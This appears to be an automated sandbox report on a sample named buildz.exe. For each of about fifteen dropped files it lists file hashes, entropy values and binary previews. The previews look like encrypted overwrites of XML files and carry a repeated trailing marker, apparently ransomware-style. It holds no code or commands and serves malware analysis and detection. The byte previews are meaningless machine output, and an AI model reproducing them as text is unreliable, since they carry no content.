                        Preview:<?xml..f@..A.Q...W...!...ke.+i#..........Qa...o@..Ip9..:.g.d....7.c..K...d..q$Ok...=m..1.+((..t.O...XT5ryo.5.p8..~...S4@...eq.b..1.RTH.].../.<....#..q....O.Z.Y}C.1..NV.AX4..k...@..*..."..]...J_.Ir.3..r.bn.....3r..T\Pe...g..T..m..^.X]s...?.,~.!....}..>r..z.$..;mK.B.H.g~X........;..9..K?#|.n..Eh..p"..5.+.. ...%..8.uY...ry...]...a:x{d...^.... ...~.. ....?..LX1WE.n..I^.Q.4X.B..n$W...j]y.,....&.<M.....q...9.PCx..0...q$R......E..H..y#...7.:.8......X.....+0..%?.,...rBa...w..r.i.z.E.y.gv)d.M......{..3.........QMw.m..)..u..a.?r..]@lVHk.5...bg<.x.K)..!....H..X..K...S...>o..........2.E...Vz.3...h.=..s:.].......W.RB.X....@..(.2.6..........@;x..9.3......~....(..0/$.LIcF...".p.B.M....JV.V:.9>..?......;8.....<..........6.*h$....>..Zi..&U7...........Gf*..o........mp.f..&e...,(-2.....=.E'.p(..V......z..R......-.G!q.....h......^.K...#..*..z..#..\.L...|$c."../VGn..^....uH....}...K2w..h.>...|.."R-.VnQ...Q....[.M.".f...J..EdRvSqD59xL4qFRlN46qLGl69IpLPjD
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1003
                        Entropy (8bit):7.822995159079495
                        Encrypted:false
                        SSDEEP:24:91zOcqJychBPs7W5ZQmRA2Y7H02jQabC/r6GbD:jNqEcXPB53yH/jQau/r6UD
                        MD5:4B35F5674AF96389E43EE7169DFE68F2
                        SHA1:F5AA9BAADFE37CE22836065D5B60A10666714BE0
                        SHA-256:C48F19139FADFE571F24A6FBA5D6DAAF9D1976AEB82104E188A6DC6D12C8B387
                        SHA-512:E69DF58B73192B7C07F619D6CF1470227173392DB8902BF31217E85346F35ACD52F80EEC0D7CD54388FF6083AD56E04FED33EBA6A26ED64D51DF13387BA99A32
                        Malicious:false
                        Preview:<?xml..\@...#.._..)|.;..w..O.z..0....aA...X}.J].4.%..$..e3]. .$.z.c...(:..b..'.e:........L...v..S[1w.A....b7V)_.W....?-r...d.a.uYiCZ...7]l........V.......W!....."...i+G..b..-.....0.n:<..S.iW...1..i.MF_..............q.r.....?..@...qB*=M".|....m.?.#.%....2.L.h...q@M.E..O...)2....J.N6..G,._..5...).c...~..*...J... .8.l.@....-Z}.....c8.X....3s.]5o......T....=.n"..."l|....a.K.'HH].9..E[S.....Ej.~A......H..f...#.Qx..........I2.P. ..R.`.J..t.j......6$/h.(K......I.h......./.1..6...Q6/...^...G...8......},.u..gV............*..Z..U.\..a..-.^:..X..u:5.7/.A..a].9.../..?..,dO%..Mr..f..G....s.k....|..F2.8f..0....z..C...1..k,'....|I.e.E.sN...c....hJt)..5.........N.^^.....].......!2.TD....N.;..I...a{.....j.....o]v.]G..5"&XI.oC.O.......t.<.F....R.....(.}..)r.o.xg.U.......Z\...B...J....&...F.'...z .I..}.6......@..u.7.9,a...m.}..c.\...*>...e...x.P.S.}H....;y..8M.S.....29.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2980
                        Entropy (8bit):7.936594729893511
                        Encrypted:false
                        SSDEEP:48:hCIFTYk0J+pHRkLg/2GwywHitK2MsLSSxk4NSPOMQrJlzxLpy2l6VtGvRUrE1HUD:hCIFUpJUR1+cK2D5dqQrJfgd4ZUrERA
                        MD5:EB118D238DA14BE21CF1968240897C4E
                        SHA1:DF5583C942AA97883DF2E9FE4391E5EC87184FFD
                        SHA-256:CCE9D8902B17DC4EC67C3667BC548D44ED9524FEFD58482C690D42E64B6E3C62
                        SHA-512:E80B8ABC0664A5E03D0B764A0B5F1DC29D97D5342465307D41310526A884FE1F4E6C94F08CB7A505F638DA546EAFBC488A94E0E094CB0BB43E6EA5CA5FCB72E1
                        Malicious:false
                        Preview:<?xmlg...e#.I..8.sm7..D....|...R.M....O.k.7../.....o.....%.3....O.X....r.[f........."....dx.b..Ni.F>&.....z..].%R.....t.g&...a.}..'.i.ZwN...w5..?.o.....9...).Q(78;/C~..*X94;..c.......cZ..........a-0.99..}..%j8.jf.?.Ik.?..>e.z..Jo..q..\.....O.B.......Y[..l!.A.De...v..~..N.nZ..F^@..q.._.+....Q.BuVr..u{`"..ok...r.;`..W.P...*.W..._....*..q.[R...........I.....#...B..%q...-......P.OL.[[..q...E......K.|.XQ.Q!./.y...~....n.=...hCBW.._u.vw..Z^lS|R......}.:..dR..".G.Y.Z..*.....i...ft..V..p..........s...w.D....Q...P.`f.......Q......K..=..J...-..p.-n...Av.....w.........[..g........?..&.*X.$.....^*N...].T..B.3..|.?q....Ku.'=N.OK.7_.h.,.?......H.....3..E...d.R...G._....T6.J.U.+.NZ._.d.5.p....S..45:....6.....^. 7..E.. 0 ....u.vw./..4].E.Yg.d....G.`.D.w...S.. ....n.-..\i.O+.6...G.j..w..[./.....Z%.`...P...{.e....b...#....H..Sh.7. f..[..Y..^K....<..}|Pvc?.f7Uw....c....{!...[|.................Vz.\..].tOS...9.?'.BL!o.....Q.b.z.u./.../`.{]P.....>....r..1
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2672
                        Entropy (8bit):7.912181145972026
                        Encrypted:false
                        SSDEEP:48:QnY4Igh6Zqa9SuM0ZFb4ekLRkiQIC1PqZOYC6O2BmR+A0CcTiyv6Vbd0USYoKjUD:idIgyqa9SVgKWV3POlj0QxReys0USYlU
                        MD5:72290EC6F4A34FA5439CA80FC380440E
                        SHA1:0A2135F4D70558AB5F6DBA6ED5E76F6C96F6361A
                        SHA-256:C31CDE887D43C081F7422C4C086270BD5CC2D00428EB7461348F53893D877E8C
                        SHA-512:1684027764F68D2D4CDC709ED9A968E09ACA84098905202A89B148AA8BE3DB1DAECF5B4C53C06695CFB472DA95D6CB80D3643689F89505387DB9C81BBE7E7813
                        Malicious:false
                        Preview:<?xml..F01/..<f.$<.:..I.>gP\...la..Yx....qD.D.c...NF.c..3.t...2..U..=..4_..~. .EF.j.5..h6.Jb.&.^z..Hf..!........s5F....[.&..jt.......z.k.sKf.(T........F$...?{@%.5.l._.5.Zf....'#x=...[).....z(...(...*..d.vN5}.5r.vR....).!.2~[/.G......]....:..D..BP.y@...%.L.-......jn...E1..L.n.....^....7......X..f.f...Mxp\5..\I_Z...i`.R-_V..YVl.4.....Z..[..I.'9.Z.../..hp.Y....^=H..O.J.z.&.....s.@..vK.LIL+...V.;|M....3G...q*:.$)........x.|'.....&..e|z)..q......4....:{......U.....w.*^.v.....r....O.F.. [..Gp.{f.e...ob8....5.}.....J.N.....c...H..(...Vqw`P....F...-z..v.....~..:K.......g...........2......),...K.f.'..'[k%v.....&.z.#.Mj....v...Nj..>" `.L..&E.....0....o#.].#w...o^.KB.D(.U*.K.SX+.i..;.|.,L...sl.Ro.\...+@K...p%$WvfA...sZ.".I.3.. ......{.....w."...s`Ub?.hAV..:!.z.Tc...@.X........I..}....$...w@\.?...@...d.g.Q.....wl>...'Ep`.v..|^.`.f....r....I.V..<.bq.K..{......Q.'.....&........"J.@=..... .....yxp..DYg...;"?.i...{..`..L..<...<e.CU.f..A..P4C.5(...I..N...]Nm:!.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2762
                        Entropy (8bit):7.921171593994183
                        Encrypted:false
                        SSDEEP:48:8VNr7VTkyGkeutcza+5rx6pPYUulOZq0M45mT8E4LMo+DxupF1XtYR6ztmD0T3B9:8VNrhTkyxZanV6pPVulCqymTOFBpFRmO
                        MD5:6C5B586978E52F79B1FA6E42CB0F6A70
                        SHA1:EAB06EDD8B52B3A5231564EFD5688CF8A49D4CFC
                        SHA-256:51BD2CD7189F0E2EB65D5CC5300A56B47EE1ECEDE937298E266257C404660C52
                        SHA-512:A163771F4A25CBC2D277934BEAD3711D43CC6D744839C4D6931A1C9C10F354DC9395DD15CDF14786487E2E3108FDE32EA7568D85334621EAB26B5505EEFCC53A
                        Malicious:false
                        Preview:<?xmlU(%#s^v.....[....%... .k.. ....V8.s....N.w.......>...... ......|..O...YDs..glGy3>..qG...XE]...?..up?4.l.W}.....xp.._.Z.4:.....>\>.o..>...r.W..P.$...K$..........G.<.0..J6...........9...3..G..._A.>, 'Y#.4a....8.........U......x.^p...}pt_...k.....VD|A.4E....(.....)...EO..-U....F....4....X...w...r.~.b.@rk&..h..UO........X.)KIR/...J...M....7...v.w..4f...7C.O=....p....3L.Ms..+8h\..w...G.....+......H.wa...v..;........Q..[.....O..D....j..Q....p..~U.z..S.~%.......,. ... ...7.q.......(.Y.'...UX..C..V2...S..).....>...3(..C@.O....f.>y.D.|...yq.n.....K.v..Y.,../S.y.T,Z.1....:%Z.qgH?.......).}..B.Hv.|.U.....s}l...^.....7l.j..o.P.}@L...uw8..9.."d...N.v.TD..].p..@...$G.I.z.uF.$....mk.....'.....~#T`v.....Z....u48...m.\....."...K...L.s....N1.".CS;......|A......z...h..<..BH.Z7]F...z$...m....[.'......T.m..?t...v.....K.j.29.}y......6.6..O..7D.....R'.....H..v.....c'..d8...(..w....kDG...C.c `....i....|..{.....J....UdB.-..DR.~....nQ..-[.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):838
                        Entropy (8bit):7.735983667011044
                        Encrypted:false
                        SSDEEP:12:ud0Tb5Hx+njWlxfi26HzpE3Ix69ubvEFKRmbDi9v15vNsfGKi43nW7yjvCOvBnFu:FYjofeTF8QfmnOd5mfdr3nJvBnXvGbD
                        MD5:26D05BF993A4A733BD1B30E8133425DF
                        SHA1:0A104C85AA9DCFC1EE8A1FC3E03CA47F1B495AB4
                        SHA-256:54E1667BBBEACD54C89CE865B0CE331E617D9B725EF6A00CDAF4975002043F1A
                        SHA-512:1538858D12AA8D8E489F3E7638BAEBDD2EF31FAB17E26B9DA5E4A61603A1C6EA640F8DF9748346041EB4F59A81D34D000641F41300BB2F64ED847499CF8D7DE9
                        Malicious:false
                        Preview:<?xml..!....8..?..76..S5.x....=.5....QF*_..]..X.....t[.}Ja-r.h.........}.Dw.j..c.X..K............&6..v..Ti...B.l.\..IIi]h.=.hZ@.O..s....A..(.$........H..{......,.....!..VA.:...f2C`$.4.P....Z.v...y]..T!L6.@)nf=....F...U.{B4.m..$..]..=.,..BL.b..~}s....).?.|........l....$f..a.i]e..$.....apk."?.e.W.,.Y/)..|.....A.,K..).Y............K.xm$j..z.~(....z....?..#*....O.J.(1....(..W=....H.....G8..)..2..f...u.0....L..p..~..6.8.>...x.?.R...1.0M..TTG.+c....L>-...S{Me..5m.B.w,s.r.<a......[sE]JY.....K>..6Q[L <.vtV..Q............_...c..;.o...y..,4.%..C.d...(..d..l...D....<......D.....(_.........|.v#-.lsO..f<r.6 ..@.....~7...=3..=...u....S6.W.....U........>....S.W."..l!.KMJ........`.d.........z.t......ru..2.O.x........d/...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1010
                        Entropy (8bit):7.797400992445413
                        Encrypted:false
                        SSDEEP:24:qZBITLcarMpMnYdpM6bq/getMq3L2w5MuKddX1BSdQW7BGbD:qZSTLcaQpqY3WhMML2t33X3S6W9UD
                        MD5:E65046A08509BD9C27E749406F25F42A
                        SHA1:DE5D814D5ADC7850B4AB13F74CFC0F16325795AB
                        SHA-256:5A95887F76F3221C030C3174D8A26E7F1E16CF5138164DA1EA2BF1EEAF672CAC
                        SHA-512:F22EF63704BC8DCB77CBAF9A4A2BE2A1FDB9942B80D25E2348931264F2F7DFB1573405BF907073425A7E982BF0DE855A3618C75DF2F5005A4EDF229C9A13BA06
                        Malicious:false
                        Preview:<?xml$...+9..I,..Ho...M.@.n\qNYhP.W.l....k..m.o_Mn.G.Ze\J.....O~v.....2}...T...FqH.DQ......j..BQ..y..H..<.?;....S..b5..Z...Bh......e..4.....By. )..a......#....P........a.[..1...;@k...*.....m...."..s.v*U.....K....n.\.M.........e.^.[....L.o|'J..L.Q....[..;.F.^..h..l....MK.X.....9..;....6....M..O3i..NAQQ....r'=d.-mW...}FB<.<.]....z..W...~..=.;.D....M....f......'..o.d......Df..[_...../.%M......T.rV.bC....N.m......G...-].n.B.w.P...zT.....8..i".X4.x..'.....F....b..i..1....B..MT...#^7hN.>v...y\.l.`.^.M......|..>.G..........e.M*.2.[*..&WrG......k*.3..[.IqWz.'...L.[aV8.}..|.%.........]fr...H;@..1.hI.# .H...b.X?@...{A...Ns....>....gKt.N.M..kj.u...].....Q++.50r..,.'@`.N...=...V...._....(t....CX..Z9f3..=...o....J.\.'*..Qg.....7~.5....?d.l..X.....A...k.K3?P.%.D..=.j.R.t.X..\.F.~.....9......$&.zJLn........0GI.ws...#..g9.y.]q.q@\.......AcXdG.B.k.Q....Ku."..i..V..5..O........&I....;b:...nAl.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1380
                        Entropy (8bit):7.834064822726734
                        Encrypted:false
                        SSDEEP:24:RSqm9x0wrzAK6dWJ/KDImL0nxHL/1aapbxZfTs4rTBvQlxWrWEpGbD:RSqmzrzAK6IJ/MPLCb11bxZf4WvQHWrq
                        MD5:3C0C2265EC09EB3559FAE2D5990765EE
                        SHA1:DD55090552F5FBC2EA4AE142780493C987BD5BE8
                        SHA-256:17D809B2752E2F81861ABFA2CF46733427A309AA76F892AAAE64A2262E1E8B37
                        SHA-512:EFAEC3E5D1C75BC805DFA127A0A71E6AFFC25974AC0AC9B781C082D10D082D34FAAC0782CDD94C0B84F23233E0C11515980DFBAA54C52DAC8B29AF7C64DD28F9
                        Malicious:false
                        Preview:<?xml&.+..X..x&...Q...............,^..t4..../'. ...."..qjD9...<...J..d...=...9...9)...A...(..a$.a...d...S..<(4(.-..T...pD...:~2k..)L..,.&.m..r.....#..H.......`1......[:..B...+p...~.W..>).....F?.4....WwW ..6...lt$../.v../. ..>..f.m.\"..^K..q>.K...P..xy....8.......D..W. w..`..&.B...#...pN..H..}....o.E|..Y4...."'...|<.,.8..oFEE;e..<.-}5.........|...*e..^.."JY......g...Q(.gu..cX..........<.!...b_.b....l.._....zP~...y.O.y.?h.*..[.U..a.Z..ay.":x.yI.V..r.8.Bs._..H.Y.T.g..7f.s.+..:[.*..>.y.,.....%...J[i..{..g..zG....\#..*.._.P.*.*`......XQ..;Vh.[......u......9...PmI............h.....?..x..c...duc...........Q2.....W).8..E..^.W...R.."...}/.,[.cNiu.!].X.{.w....t...o.....p.)n\...7p.....~...$.|'...86.....a.}u`..w.S)....;.....q.J.:.hZ.>.5.....eX.vr....9..O. 0Jpp..8..^..../.;.1........^.V.%1..N&.7.......5s8D.Hd...?.{.....&n......)u{.s+.H.Rp...e..,4&.^...Z. ..".|w..[.o.iZ.N.*..\9..........X..&.....;..r.r*...6.59.Y..GW....lvwIN..ok......q.M.;"N..u..bC9...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1614
                        Entropy (8bit):7.884188593175775
                        Encrypted:false
                        SSDEEP:48:wyPpnLObrjPkP6u7dwYRTyGtYrYJoW0nVUD:JxG7+D7bwGthrqVA
                        MD5:8157250839DD93472F472F08A14BAEC1
                        SHA1:82DCB8DA8637AA8D51D3FEF3DDD7779A5D02328B
                        SHA-256:5469105604B82053A3014051E97E3D2CB2FA7135A783AB2981AC23ABE2939290
                        SHA-512:76EF2F0059C67E46FD4C5808A984D8776BCCED2BF4AADB8FB95A21C9F3B44E6FECD4AD9E1747142959B06E3FE2E753563BF0E6E3EC6ADC3BA1DA93785158409F
                        Malicious:false
                        Preview:<?xml|.!.U..\C.I.gX....#...\.!..v&;8Ka.w(..e..to0WU.j.....=u..}...m..a._.....L..k....`....s4.&Tx...C...K.W.6.c<{(.w3y/.Wk,V-.qJu>H..........(pB(.njan....2...R.......9^v...-..$.. .^..%.D.1.|..]..(.*.6.y...|...u4,5..M.._.L....9..}t..H.].....%....g\.u.Z.x.9.F1..7...G&.J$..GU.E...2.6.q.{Y..+. ..[<..Z&.V.z.1.....8*.sFP...4/)cQ`.x.".7.-..Vs ..ela..-...........-.(~G1wX.Z.{.....o$...C..fi....5+x.....`a.... ..e..)8.X....R.y..B...bwh.2...|..m.Z.......ub5J#.....M....(..T#.$.8P..L:&".D.T\...%...9s..6...g..ox.K1\.0..Hu.(7.XCj.A J......,/.j[.z........:.`.W..?.....(.s/...5.+[.....~.^r46..,.s.~..+.(...L.w...7.QF%0{E0F.k7 ..N9.&U. ...........7h..~.4.X.O..:.K.B6.....}..m.R..o.^SJ.....<..R. ..>.......(..J...?:...N.v.{ZVw-...t._..H/A+.9.2...k.H.o.bJ.-C..2..[.Q....P._....;...r|......0......=k.o/I....!j.Oy;1.E$N...%9....@.&.`i.}..z..\%.3..%.J..].>..K..'.$lr...D]...4..N.7....&%..s.i..j.z?v.h..pB...N.....Mf$.m..7[R.8.l>.b......B rc...K..K.}..^....V.R.h....\
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2753
                        Entropy (8bit):7.929161280867265
                        Encrypted:false
                        SSDEEP:48:BkR6IsfZlSch4hkS6gFZAgzSDlvwjV5RRcGu2iBJfrcMPyLJG7Wm+Xl5L4UD:BkvchZShDeQtOTThE4X+Xlp4A
                        MD5:F1C2E7A4DE0AEC569E690E966A785B62
                        SHA1:FC6B723A33F15068A013658A0B70B9D20B1BAB19
                        SHA-256:5E94D8298E1C4D031B6951926C42CB74ED450C2DF71CB4D808B343C97F152DC6
                        SHA-512:6B117ECA113048962BF1FC95E520681F8C61B86448CF6D576754E3CC836152FE7FB3CEA781630C2448BEED4563B1D6C94FFC77CF44F710BB4D3F6EC4563251D7
                        Malicious:false
                        Preview:<?xml%7*..x.@..,._........`..w..!.Y.6.0...'.v.;..W.z....|...{.}mL..8...x.\'.w.....cz!.........._.C......a.$.....S.`u....O ..].M..}...]...[..... lOrC..]B..N.r..G0.A.O..nQFL....G..r..n.?.h...$.0..........>1.ZQ.1~...DY...X."..#=9..q...&....b.pe..3w........./WPv.....#..\6e..8......p.@..S&-.=D.yn.....*...z9Q...{y.J....Ab<*0.vV.Wv....XS....~ccu.'(].................E..@.l...3.s..d...b.8Isf......G...F>9:...t.;..,qH..{PZD..f.Jx.:i]f.}*..D.o......1...;$2^.PUql3L.B....[..N..y.~..us.~.u.lQ.Y.S.......-!FK.wp.......O........f..X..{.....p.h.+.*....Q....!n......_p.(._...&..D.b1.hS...A...DS..`.3..C@.O.>!..."...!..N..@".y..}oO.>b.F...K....^.~..p.!....:..q..WX.....#...F).B...22..:._..\.[6.YvC,..J.B............u..p..y.mcg1.#.u.....'R....p/D...A.n.Y.z...(....c4v....I].....I.|.....Y++D.NL....F..`|g.r.g./....y`...@F...WU..+...?...N.....nr*.......`9.LCH.&..J..t`.g].X.)..N.tll.?.I..=..$...e..dV\.].7y.g!..x...N<..E^.O.@).~.U-^B....U.{....7...W...q..z.-.Bh..Z...~..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1558
                        Entropy (8bit):7.88582652120829
                        Encrypted:false
                        SSDEEP:24:evssDxD0AGYdnZpPvflYYNqOrSLuLQt1oUEoUnwAf16rHICAaLzUcmQxXGbD:cssV4snHHfsmDzjwUATyaLKQxXUD
                        MD5:4D4AAEBF7699A56EF6DB84B127ADFF17
                        SHA1:C767A2F4A0D4039A9014A70E8C334B7F553950ED
                        SHA-256:2A4713D53C0AD8911F270AABDF3B77C2C51EB3FE3FC89990C0D92272DA446C54
                        SHA-512:81DB9ED1DDD67DE13DE13258C9996950F2CFDD9F3A1307C021737E24B00580A9B6AF7B7E15CE88B72F8664C47B5D64F267373ABCF690D8E20588D6662E992590
                        Malicious:false
                        Preview:<?xml....u.>..C....).9c.D.K...Ar...47....{....f..})6..k..!j.........D.Er. .........m<.....Aki...51U.$/.o..lu.)<.)..OK....d8yh......W...v.y.......{{...L..(..Ao.gp=qfZ.|&g...J.~....4 X....I....v\...r..'.0l...O.....J..c.#&WrYT.e..`..?|.&...BER......a..8,....L./H$Q.+.f....y..@.n....KC.rP.h..cc....Ac-...4\....]K..6...~w4..*....(.8.s.K..Rs}..8....r..;..V....@<.DY.u.....K..H'...{.~_.F6....$m.....~.9mw......I.$..........L...x.K.CU..U........".G..(.....P/fy.o.f_..=.w5A.....-.....q.v[C.;........m...S.Tg.m.`..6... .....Y.`........[%v........;2.u.y./m..:....7xh..P.a.JjL0.....L...bQ..:....P.i.}..l.....r...W.( ../........M.l...=&5.R.9|z....?H.yq!.|..@_.........Zb....7C......."r......~......!EQ...........r.....2H.....9...yA.....!O...c.:.IV.^U...HL.i.P.'..ot..A.K.j1...6j.. ..c.Za.t.ji..pe..A,.......'..d./.T.*\/...........]..P>V$..'3..........}"...tu.........E...W.3#/-q%Z.S..@......,-.....vT.%.i.m.....SDyH.y...4.........H.......D!....+...j..7.Ib.n.%..."$..7....?
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2251
                        Entropy (8bit):7.918538861475401
                        Encrypted:false
                        SSDEEP:48:QEOKmnEKhwwbGZNBc37zHj7b88yGu6xCvINw7NVOUD:xOfnvhwlZNW37zjeXOA
                        MD5:91F9C84054629B0351DA4D3CC3C9B3C1
                        SHA1:CB9D75BE4C33E9F579FB6ED0E02C27BC6363BAE4
                        SHA-256:DA409CCDF7F1D870C726274001BD41963019CE5D97568FC4379FDEC98BD2F724
                        SHA-512:AFFC4FFB7FA09E97B51C4178CD5DDD51DF34CFEE2BE305782D69F8F5AEA83D59C499AB9B404078FE5BA9A75D0DB94041D22DF59A5A785C7CB3A9A759B27A5C51
                        Malicious:false
                        Preview:<?xml...M~.`.......U..Ue.........P6....xI7H....V...o..u.....-....`c ....K.........F0R.V.X...AO~d.^.:M.j.p.{.jy$..gY.T.x.uG...YSN.....YQ..S]@...~{.....d...3M.....v.m....k.....$.O....'.&..GnE.4...0. ;..:.......i.n.q...'7.........`.v1lqAD..eY......%L>..F.G.p.5H..VBNG..`.../L...3...p.W.Pl..k:A..D..7f....6+Q..<Z.'w...#a].K.P.%.....+.G...;..V.R.....1....K..t./...xh......u.@w.j./.0.?...x.*N..Fwa.a.3D....DP.}'KH(..ly@0GB..yr...r_....t.............`../.1.l..=.e.S..M.'#.X.{..!M.g..y..).x....."..HT....v=2..fO..!..I...m......L..sHh.M".z.[...5{...y..AHXLfZV..b.X....K..5..WZvg.N..rr%.$.&...@1+...\.........A0....0g...v|....).I...P.w.>...E<.....".....*.e.rQ?`..gL.c..x."..l.QF./]&.......n..5^..k.o6+..Ob .."....Q.......vu..#.....r.c...h..=......S.Z.....o.t..d....F..f.A~.j...*..P.|..,..,.'f..2..B..3..E...=E.D.....b.v....D...e,..4..V>L...O5p.._Q..L.e..x.X..cwX..`1F\..q.}. ...>..T.@7...[..4a.,./...?......V.u8...k....S...x..|.s.'.O...y...?....&.....b...M..hv
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1826
                        Entropy (8bit):7.866798323652442
                        Encrypted:false
                        SSDEEP:48:ZRYMAIzQw6vmYNz/mgtIuZ3Obo/bV1zqgYkCNvUD:ZRYdAarDMkOb8V1zqgx8A
                        MD5:4C6A7385C37DA229F21058703F95C9B5
                        SHA1:50D6E6BC68C2885C0C49D2AAF31E6CF9442FE271
                        SHA-256:D1A8B5614E599154E65A68952D5072946473FEF88ADEA1B097264D14B70E69A7
                        SHA-512:70943532B12A668B29BB044C2752CE3C32D11C05EF86FA1925E1FD46DCC0543C5EEAE3D61C0DF73071C83E9655C2C34106F372FB746ECB8F11358C6A9F35C510
                        Malicious:false
                        Preview:<?xml..VA.p.:z8.\.. ...^....8.s5l..1<P?r..B.V_.c.UM.....sEx`...S......ow......(...p.............g..![.,.g(.#.k.[.".....0.^.*...t.I...M..4}.7.&8K....0........9.995...sL.`.c...J.>...z../d3...s..-......[....@..].Z3...qRI.2.f.o8t..T/......Z...]..;..yJ.....9q-.%..Q.........Y..+...$.......H.x..?..X..|j.T.8qd.D.i.9....r....=5..@..I$.%..>.....|.m...YqP.|..mT..5M..g.m...}.UJ/....Q..o.[Hb..#...mV8\)..o...F........Y...m.P....{._......d...;;..R....f(......q..r.H.>.&'7...f...2..8...O)...8.\.d`m...'..0.`(3.:_n.....q.'WLb..{5.W./.i...."..9.z.cL...C.r?|Z.F_Z.!b..a.....P.+.'.......?.z%N.L....8(*.f.i.....B..Pby...sNW....C%a"..M.p.d.... ...t...q...a.{t ....".Y2..j.d.y........u0..4...}.p...O..&..D5..l.2`iTL.r.>..A..C..P...=c..843.~..[...S.(..2.....!.N,o. ;..A..2..?m....JY.6..bC.Y.M.......St..oL.....".'..z...G.....~;.....n...,.M.ox..0M....-"V..a/.j..-.w.7...&..0`....@..[.....}.4..90%.....#<.>2.i.c.~'Q.5s...{.W..?t.Q..h..w.....d.....B....4.UO....LV..{...R.....qzLcv.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1197
                        Entropy (8bit):7.8085617536759
                        Encrypted:false
                        SSDEEP:24:tBHpsdvXBqefQQTINDzHbsxzXP+NrMdMcWgc1gm4ZLG/f3UUkOMVLDg3GbD:THpsF0e4QT0DzHbsxzmNrMd4gcdOO+LF
                        MD5:047060DEB4B17DD3B5412D6339A5ADDF
                        SHA1:941DE71C70DDC797CCA45E17E2ECFA063C7F8855
                        SHA-256:EAD9B048DFF2A3E3DA7549D0BB1C324A959DDC47DA882DD97B79A3C3395E5A8D
                        SHA-512:F116355A0B7BDEFDF751A9A6B13E5A4E7400B236575A9D3CE07152E07B0473B47A6C084BEB335992E423D432A268EE91C952AEAFEF479DC1E22EFFA7A1C419C1
                        Malicious:false
                        Preview:<?xmlL........["...\.Z...$....I.ee....../*;\v%_{`.........J5.1.,CL.... .YN.}.Pz...`G..&......Z...I.w..u.M..0..c....U..=d..L +..^m.......`..]Z...7q..=m.....d.......v.....H....R.j.AH..h={.[;6..%n.B;..`IEl..... ..-..39..e..Ddb6 .._I.[.N...|.Z..c....A......(9..pwl.....<Vd....?.v...........6Z...-..j....6>g.Rbc../...>..3..)n...'............n?C...{...Z...7..."....ScS.../..`...`EP..TS/X...3?.6.....P...O..'.g....n.(lV.`&{..}..Z..jA<......`. U5...d....:.&q6I.XKX;.h...7.{.\/;<t....y...'..s......-..K'.G$^ q.}LH..D.R!..p..S..............S.D.[...43.{...J.w..3....y_.HjS...-.y...3.....g).~..f>0..9..)C.O4.<.X..c..:[...*~.;M.%..-.....0L.....OM._...L.N.b.V........YZbE.. .E..a:1.> ..w...E.....I.k6`..r.g..:hI[..I..,0...J.N..Z{.p...q..\.F.......tS.@.......'....p.X.^?.0jA....w.].KS ..y%D...W....k@.S+.P........[H.........!=t..t/KZ..p.....K..&..:HH&.....Y%.T.Pk....8s.D..KN..7m.wA..#...~...H..e$.[.Tz...&...&..SEjVO...E.}D.".~...2>...K...bR..5.Q.x.[..PBcE
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1004
                        Entropy (8bit):7.742527897584331
                        Encrypted:false
                        SSDEEP:24:Mzz91GIFmAvsEfRhPo6LOaBnvBrqCPzGbD:C91GIwp6LjBvB2IUD
                        MD5:31AE465C37464801F791133BE22CF2D8
                        SHA1:14C40390CCA7FF2E19E7165129D7853AB64C3C81
                        SHA-256:6CC4D99904932DDCABE5442E192FA6FDBE86BCCA173239E8FA30549AB1EB0C26
                        SHA-512:E9F707503A7D3377BE3100ECA9FB89A27811599E30F1CAF0FDDA5E40C1C3ACA5A1D38F6C1E077CC64A509FB222BC65A45B2D8D57A888F4BC0473785CACAEDA22
                        Malicious:false
                        Preview:<?xml...`...[..({s.S...L.!...U..... Z.T.j..N...*^....... ..%.9H.2a.....1J.E".O.!..j.cI.5.......X..-z....3l.....l>.F.6Y+.....S..'B.\%p].....tr~....gt...SM..U.z....o...E..`..>....*..P9.q.......].$fb.{.xM...z...AO..-.d.......2x..u .1..#l...m.....7.....`....A....CD.4..%.!T...NWbZ...+.c.>%K.j.`H.x.u..R>Q<.0c.E.H&.....y.opI...^..qn..R..S.Y..rP_D......s}S....f..S..:.0b.Sl.W,[..;O.R.V...6....!i...T.3.rM.c~.2.j...t.sT.......o.N.;0mVs_0.oQ....."....]......O.01..X..=.Qy6x..N.Zj.. 4...Z..o..d..1+.C0X.$m%...r...bHU...$.w.l.........sV.dH2..p..>...{.[?70...w........+Ic...=.... .S.G...-.Y..U..iSH..7.F........9!...... .....)n5........ .F.._.O`**yO<.H&L].I...I......"........i3 ...Q0.&.l....._;+r.8...x.(.;X'R....W.8.).EI.s..4E.{.....f...9n.;U..,..Jp........;...,s.].`.v..a79.P.bO.3{...u.#.....9..TL..O1.#?.A6)..H.3......}...Kk..s....O.....rC.......-.I;.R.Nc...^....F.7....?......L.A#A...v...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
